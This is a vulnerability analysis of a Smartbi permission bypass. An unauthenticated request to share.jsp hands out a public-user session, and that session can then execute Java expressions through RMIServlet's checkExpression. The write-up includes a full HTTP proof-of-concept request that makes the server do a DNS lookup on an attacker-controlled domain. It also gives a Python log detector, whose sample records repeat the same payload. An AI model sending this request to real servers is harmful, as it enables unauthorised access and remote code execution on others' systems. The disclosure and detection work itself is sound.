Smartbi Share Permission Bypass
Q1ngShan

Vulnerability analysis

vision/share.jsp
[screenshot: V11 Share permission bypass 20250825144124395]

[screenshot: V11 Share permission bypass 20250825144147676]
share.jsp queries the database for a default share ID whose c_publicshared column is 1. If such a record exists, the page automatically logs the requester in as the public user, so no credentials are needed to obtain a session.

```
mysql> select * from t_share_record;
+-------------------------------------------+-------------------------------------------+----------+--------+-----------+-----------+-------------+---------------------+------------------+----------------+---------------+-------------+-----------+--------+--------------+---------------+---------------+-----------------------------+
| c_id | c_relateid | c_userid | c_code | c_enddate | c_deleted | c_cancelled | c_createtime | c_deleted_userid | c_publicshared | c_sharetarget | c_sharetype | c_purview | c_hide | c_sharegroup | c_relatename | c_relatetype | c_relatepath |
+-------------------------------------------+-------------------------------------------+----------+--------+-----------+-----------+-------------+---------------------+------------------+----------------+---------------+-------------+-----------+--------+--------------+---------------+---------------+-----------------------------+
| Iff808081017e7bfb7bfbead4017e8609a8eb62d5 | 96a0a9d0b86f90d5416d013f4cfe2f23 | ADMIN | NULL | NULL | 0 | 0 | 2022-01-24 00:53:53 | NULL | 1 | NULL | 0 | NULL | 0 | NULL | ??????-?????2 | ??????-?????2 | ????\?????????\????? |
| Iff808081017e7bfb7bfbead4017e865caa8e463b | Iff808081017e7bff7bff1888017e8108eeec09bb | ADMIN | NULL | NULL | 0 | 0 | 2022-01-23 04:55:27 | NULL | 0 | NULL | 0 | NULL | 0 | NULL | ???? | ???? | ????\?????????\?????\?????? |
| Iff808081017e8f318f313688017e9021513b3dfb | b904ab9f5a84712a672523a7b4881ee4 | ADMIN | NULL | NULL | 0 | 0 | 2022-01-25 02:28:28 | NULL | 1 | NULL | 0 | NULL | 0 | NULL | ???? | ???? | ????\?????????\?????\?????? |
| Iff808081017e996f996f71a4017ec3a04edc562e | c9c298ba657587c42cba00490b5b07a9 | ADMIN | NULL | NULL | 0 | 0 | 2022-02-04 02:26:10 | NULL | 0 | NULL | 0 | NULL | 0 | NULL | ??? | ??? | ????\?????????\?????\???? |
| Iff808081017ee7d1e7d105b1017eecfa8f2d2108 | Iff808081017ee2a0e2a05606017ee66b4a312301 | ADMIN | NULL | NULL | 0 | 0 | 2022-02-12 03:09:11 | NULL | 0 | NULL | 0 | NULL | 0 | NULL | ????????? | ????????? | ????\???????????\???? |
+-------------------------------------------+-------------------------------------------+----------+--------+-----------+-----------+-------------+---------------------+------------------+----------------+---------------+-------------+-----------+--------+--------------+---------------+---------------+-----------------------------+
5 rows in set (0.00 sec)
```
(The question marks in c_relatename, c_relatetype and c_relatepath are non-ASCII resource names that the MySQL client could not render; the values of interest are the two rows with c_publicshared = 1.)

Two default IDs satisfy the condition (c_publicshared = 1); one of them is used for verification.
[screenshot: V11 Share permission bypass 20250825144434718]
Request without a cookie:
[screenshot: V11 Share permission bypass 20250825144501390]
With the session cookie obtained from share.jsp, the resource is accessible:
[screenshot: V11 Share permission bypass 20250825144520442]
Expression execution

With that session, the checkExpression method of MetricsModelForVModule, reached through /vision/RMIServlet, evaluates the string passed in params. The expression below calls java.net.InetAddress.getByName on an attacker-controlled requestrepo.com hostname, so a DNS lookup arriving at that domain confirms server-side evaluation out of band without needing any output in the HTTP response.

```http
POST /vision/RMIServlet  HTTP/1.1
Host: xxx.com
Cookie: JSESSIONID=38CD11F48EDF07F542F9DD644D94434C;
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

className=MetricsModelForVModule&methodName=checkExpression&params=["java.net.InetAddress.getByName('aaa.pjr67crh.requestrepo.com');"]
```

[screenshot: V11 Share permission bypass 20250825174005841]
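The two-step chain above (an unauthenticated share.jsp request that hands out a session, then a checkExpression call over RMIServlet on that session) is easy to hunt for in front-end request logs. The detector below is an added example written for this page, not code from Smartbi or from the original post. It assumes a reverse proxy or WAF that records each request as a dict with the method, the path without query string, the inbound Cookie header, the response Set-Cookie header and the raw form body; that record layout, the SUSPICIOUS_EXPR list beyond the java.net.InetAddress case shown on the page, and SAMPLE_RECORDS are all constructed for the example.

```python
# Added detection example for the share.jsp -> RMIServlet checkExpression chain.
# Illustrative code written for this page; not Smartbi code or the post author's.
#
# Assumption (not from the page): a proxy/WAF logs each request as a dict with
# method, path (no query string), inbound Cookie, response Set-Cookie and the
# raw form body. The record layout and SAMPLE_RECORDS below are constructed.
import json
import re
from urllib.parse import unquote_plus

SESSION_RE = re.compile(r"JSESSIONID=([0-9A-Fa-f]+)")

# Class references that have no place in a metrics-model expression. The
# java.net entry is what the page demonstrates; the others are common follow-on
# primitives and are this example's assumption.
SUSPICIOUS_EXPR = re.compile(
    r"java\.(?:net|lang|io|nio)\.|javax\.|Runtime|ProcessBuilder|ScriptEngine"
)


def session_id(header):
    """Extract the JSESSIONID value from a Cookie or Set-Cookie header."""
    m = SESSION_RE.search(header or "")
    return m.group(1) if m else None


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body, splitting only on '&'
    (older urllib.parse.parse_qs also split on ';', which would cut the
    expression on the page at its trailing semicolon)."""
    form = {}
    for part in body.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        form[unquote_plus(key)] = unquote_plus(value)
    return form


def flag_chain(records):
    """Return findings for (a) share.jsp issuing a fresh session to a client
    that sent no cookie (the public auto-login) and (b) RMIServlet
    checkExpression calls that ride such a session or carry suspicious Java
    class references in params."""
    public_sessions = {}
    findings = []
    for i, rec in enumerate(records):
        path, method = rec["path"], rec["method"]
        if path == "/vision/share.jsp" and session_id(rec.get("cookie")) is None:
            sid = session_id(rec.get("set_cookie"))
            if sid:
                public_sessions[sid] = i
                findings.append({"index": i, "kind": "public_autologin", "session": sid})
        elif path == "/vision/RMIServlet" and method == "POST":
            form = parse_form(rec.get("body", ""))
            if form.get("methodName") != "checkExpression":
                continue
            sid = session_id(rec.get("cookie"))
            try:
                params = json.loads(form.get("params", "[]"))
            except ValueError:
                params = [form.get("params", "")]
            expr = " ".join(str(p) for p in params)
            from_public = sid in public_sessions
            if from_public or SUSPICIOUS_EXPR.search(expr):
                findings.append({
                    "index": i,
                    "kind": "expression_exec",
                    "session": sid,
                    "from_public_share": from_public,
                    "class_name": form.get("className", ""),
                    "expression": expr,
                })
    return findings


# Constructed sample: the first two records replay the chain on the page; the
# last two are an authenticated user opening a share and a harmless-looking call.
SAMPLE_RECORDS = [
    {"method": "GET", "path": "/vision/share.jsp", "cookie": "",
     "set_cookie": "JSESSIONID=38CD11F48EDF07F542F9DD644D94434C; Path=/; HttpOnly",
     "body": ""},
    {"method": "POST", "path": "/vision/RMIServlet",
     "cookie": "JSESSIONID=38CD11F48EDF07F542F9DD644D94434C", "set_cookie": "",
     "body": "className=MetricsModelForVModule&methodName=checkExpression"
             "&params=[\"java.net.InetAddress.getByName('aaa.pjr67crh.requestrepo.com');\"]"},
    {"method": "GET", "path": "/vision/share.jsp",
     "cookie": "JSESSIONID=0000000000000000000000000000AAAA", "set_cookie": "", "body": ""},
    {"method": "POST", "path": "/vision/RMIServlet",
     "cookie": "JSESSIONID=0000000000000000000000000000AAAA", "set_cookie": "",
     "body": "className=MetricsModelForVModule&methodName=checkExpression&params=[\"x*2\"]"},
]

if __name__ == "__main__":
    for finding in flag_chain(SAMPLE_RECORDS):
        print(finding)
```

Run against the constructed records it reports the cookie-less share.jsp hit that received JSESSIONID 38CD11F4... and the checkExpression call made with that same session, while the authenticated share view and the benign-looking call are left alone. A checkExpression call with a suspicious class reference is reported even when the session did not come from share.jsp, since the expression evaluation itself is the dangerous primitive.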